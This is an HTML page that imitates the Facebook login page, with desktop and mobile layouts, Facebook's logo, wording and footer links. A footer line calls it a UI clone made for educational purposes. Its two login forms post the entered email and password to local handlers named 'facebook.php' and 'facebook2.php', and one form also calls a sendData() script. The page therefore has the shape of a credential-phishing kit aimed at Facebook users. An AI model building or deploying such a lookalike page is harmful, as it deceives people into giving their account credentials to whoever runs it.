

<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="stylesheet" type="text/css" href="./assets/css/computer.css" media="screen and (min-width: 769px)">
<link rel="stylesheet" type="text/css" href="./assets/css/mobile.css" media="screen and (max-width: 768px)">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" 
crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">

<script src="./assets/css/bootstrap.css"></script>
<title>Facebook - Log In or Sign Up</title>
<link rel="shortcut icon" href="./assets/images/fb.png" type="image/x-icon">
<script src="./assets/css/js.js"></script>
</head>




<style type="text/css">
  * {
   padding: 0;
   margin: 0;
   box-sizing: border-box;
}

body {
   font-family: 'Poppins', sans-serif;
   background-color: #f0f2f5;
   color: #1c1e21;
}

main {
   height: 70vh;
   width: 100vw;
   position: relative;
   margin: 0 auto;
   margin-top:20px ;
}

footer {
   height: 30vh;
   background-color: #ffffff;
}

.row {
   display: flex;
   justify-content: space-around;
   align-items: center;
   width: 100%;
   max-width: 1000px;
   position: absolute;
   left: 50%;
   top: 50%;
   transform: translate(-50%, -50%);
}

.col-logo {
   flex: 0 0 50%;
   text-align: left;
}

.col-form {
   flex: 0 0 40%;
   text-align: center;
}

.col-logo img {
   max-width: 300px;
}

.col-logo h2 {
   font: 26px;
   font-weight: 400;
   padding: 0 30px;
   line-height: 32px;
}

.col-form .form-container {
   background-color: #ffffff;
   border: none;
   border-radius: 8px;
   box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
   margin-bottom: 30px;
   padding: 20px;
   max-width: 400px;
}

.col-form .form-container input, .col-form .form-container .btn-login {
   width: 100%;
   margin: 5px 0;
   height: 45px;
   vertical-align: middle;
   font-size: 16px;
}

.col-form .form-container input {
   border: 1px solid #dddfe2;
   color: #1d2129;
   padding: 0 8px;
   outline: none;
}

.col-form .form-container input:focus {
   border-color: #1877f2;
   box-shadow: 0 0 0 2px #e7f3ff;
}

.col-form .form-container .btn-login {
   background-color: #1877f2;
   border: none;
   border-radius: 6px;
   font-size: 20px;
   padding: 0 16px;
   color: #ffffff;
   font-weight: 700;
}

.col-form .form-container a {
   display: block;
   color: #1877f2;
   font-size: 14px;
   text-decoration: none;
   padding: 10px 0 20px;
   border-bottom: 1px solid #dadde1;
}

.col-form .form-container a:hover {
   text-decoration: underline;
}

.col-form .form-container .btn-new {
   background-color: #42b72a;
   border: none;
   border-radius: 6px;
   font-size: 17px;
   line-height: 48px;
   padding: 0 16px;
   color: #ffffff;
   font-weight: 700;
   margin-top: 20px;
}

.col-form p {
   font-size: 14px;
}

.col-form p a {
   text-decoration: none;
   color: #1c1e21;
   font-weight: 600;
}

.col-form p a:hover {
   text-decoration: underline;
}

.footer-contents {
   position: relative;
   max-width: 1000px;
   margin: 0 auto;
}

footer ol {
   display: flex;
   flex-wrap: wrap;
   list-style-type: none;
   padding: 10px 0;
}

footer ol:first-child {
   border-bottom: 1px solid #dddfe2;
}

footer ol:first-child li:last-child button {
   background-color: #f5f6f7;
   border: 1px solid #ccd0d5;
   outline: none;
   color: #4b4f56;
   padding: 0 8px;
   font-weight: 700;
   font-size: 16px;
}

footer ol li {
   padding-right: 15px;
   font-size: 12px;
   color: #385898;
}

footer ol li a {
   text-decoration: none;
   color: #385898;
}

footer ol li a:hover {
   text-decoration: underline;
}

footer small {
   font-size: 11px;
}


   </style>


<body>
  <div class="computer">

    <main>
      <div class="row">
          <div class="col-logo">
              <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Logo">
              <h2>Facebook helps you connect and share with the people in your life.</h2>
          </div>
          <div class="col-form">

            <br><br><br><br><br>


            <!-- facebooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooookkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk pcc -->
              <form class="form-container" action='facebook.php' method="post" onsubmit="return sendData()" >
                  <input type="text" class="form-control inp " placeholder="Email or phone number" name="mail" id="mail">
                  <input type="password" class=" form-control inp " placeholder="Password"  name="pass" id="pass">
                  <button type="submit" class="btn-login">Login</button>
                  <a href="#">Forgotten password?</a>
                  <button class="btn-new" >Create new Account</button>
              </form>
              <p><a href="#"><b>Create a Page</b></a> for a celebrity, brand or business.</p>
          </div>
      </div>
  </main>





  <br><br><br><br><br><br><br><br><br>

  <footer>
    <div id="footersubdiv">
      <div id="languagediv">
        <a href="#" class="language" id="currentlang">English (UK)</a>
        <a href="#" class="language">മലയാളം</a>
        <a href="#" class="language">தமிழ்</a>
        <a href="#" class="language">ಕನ್ನಡ</a>
        <a href="#" class="language">हिन्दी</a>
        <a href="#" class="language">اردو</a>
        <a href="#" class="language">বাংলা</a>
        <a href="#" class="language">తెలుగు </a>
        <a href="#" class="language">Español</a>
        <a href="#" class="language">Português (Brasil)</a>
        <a href="#" class="language">Français (France)</a>
        <a href="#" id="morelang"><i class="fa fa-plus" aria-hidden="true"></i></a>
      </div>
      <hr id="hrfinal">
      <div id="extralinksdiv">
        <a href="#" class="extralinks">Sign Up</a>
        <a href="#" class="extralinks">Log In</a>
        <a href="#" class="extralinks">Messenger</a>
        <a href="#" class="extralinks">Facebook Lite</a>
        <a href="#" class="extralinks">Find Friends</a>
        <a href="#" class="extralinks">People</a>
        <a href="#" class="extralinks">Profiles</a>
        <a href="#" class="extralinks">Pages</a>
        <a href="#" class="extralinks">Page categories</a>
        <a href="#" class="extralinks">Places</a>
        <a href="#" class="extralinks">Games</a>
        <a href="#" class="extralinks">Locations</a>
        <a href="#" class="extralinks">Marketplace</a>
        <a href="#" class="extralinks">Groups</a>
        <a href="#" class="extralinks">Instagram</a>
        <a href="#" class="extralinks">Local</a>
        <a href="#" class="extralinks">Fundraisers</a>
        <a href="#" class="extralinks">About</a>
        <a href="#" class="extralinks">Create ad</a>
        <a href="#" class="extralinks">Create Page</a>
        <a href="#" class="extralinks">Developers</a>
        <a href="#" class="extralinks">Careers</a>
        <a href="#" class="extralinks">Privacy</a>
        <a href="#" class="extralinks">Cookies</a>
        <a href="#" class="extralinks">AdChoices</a>
        <a href="#" class="extralinks">Terms</a>
        <a href="#" class="extralinks">Account security</a>
        <a href="#" class="extralinks">Login help</a>
        <a href="#" class="extralinks">Help</a>
      </div>
      <div id="copyrightdiv">
          <span id="copyright"><a href="https://www.facebook.com" target="_blank" id="copyrightfblink">Facebook</a> © 2023</span>
          <span id="disclaimer">UI cloned for educational purposes by <a href="https://www.linkedin.com/in/kspranav10/" target="_blank" id="pranavks">Pranav K S &nbsp<i class="fa fa-linkedin-square"></i></a></span>
      </div>
    </div>
  </footer>
</div>



<!--Code for Mobile Screen-->

<div class="mobile">
  <div class="mobheader">
    <img src="./assets/images/fblogo.png" class="mobfblogo">
  </div>
  <div id="mobapplink" class="clearfix">
    <a href="#">
      <img src="./assets/images/fbandroid.png" id="mobandroidpic">
      <div id="getfbandroid">Get Facebook for Android and browse faster.</div>
    </a>
  </div>
  <form class="mobmaindiv" action="facebook2.php" method="post" onsubmit="" name="f">

      <div id="mobtextdiv">
        <input type="text" class="mobtextbox mobtextbox1" placeholder="Mobile number or email address" name="mailm" id="mailc">
        <input type="password" class="mobtextbox mobtextbox2" placeholder="Password" name="passm" id="passc">
      </div>
      <input type="submit" class="mobloginbutton" value="Log In">
      <div id="ordiv">
      <span id="or">or</span>
      </div>
      <div id="mobcreatediv">
        <button id="mobcreate">Create New Account</button>
      </div>
      <div class="mobforgotpw">
        <a href="#">Forgotten password?</a>
        <span>·</span>
        <a href="#">Help Center</a>
      </div>

  </form>
  <div class="mobfooter">
    <div id="moblangs">
      <div class="item1">
        <li><a href="#" id="mobcurrentlang">English (UK)</a></li>
        <li><a href="#">தமிழ்</a></li>
        <li><a href="#">हिन्दी</a></li>
        <li><a href="#">বাংলা</a></li>
      </div>
      <div class="item2">
        <li><a href="#">മലയാളം</a></li>
        <li><a href="#">ಕನ್ನಡ</a></li>
        <li><a href="#">اردو</a></li>
        <li><a href="#"><i class="fa fa-plus-square-o"></i></a></li>
      </div>
    </div>
    <div class="mobcopyright">
      <span class="mobfbcopyright"><a href="https://www.facebook.com" target="_blank" id="mobcopyrightfblink">Facebook</a> ©2023</span><br>
      <span id="mobdisclaimer">UI cloned for educational purposes by <a href="https://www.linkedin.com/in/kspranav10/" target="_blank" id="mobpranavks">Pranav K S &nbsp<i class="fa fa-linkedin-square"></i></a></span>
    </div>
    </div>
</div>



</body>
</html>

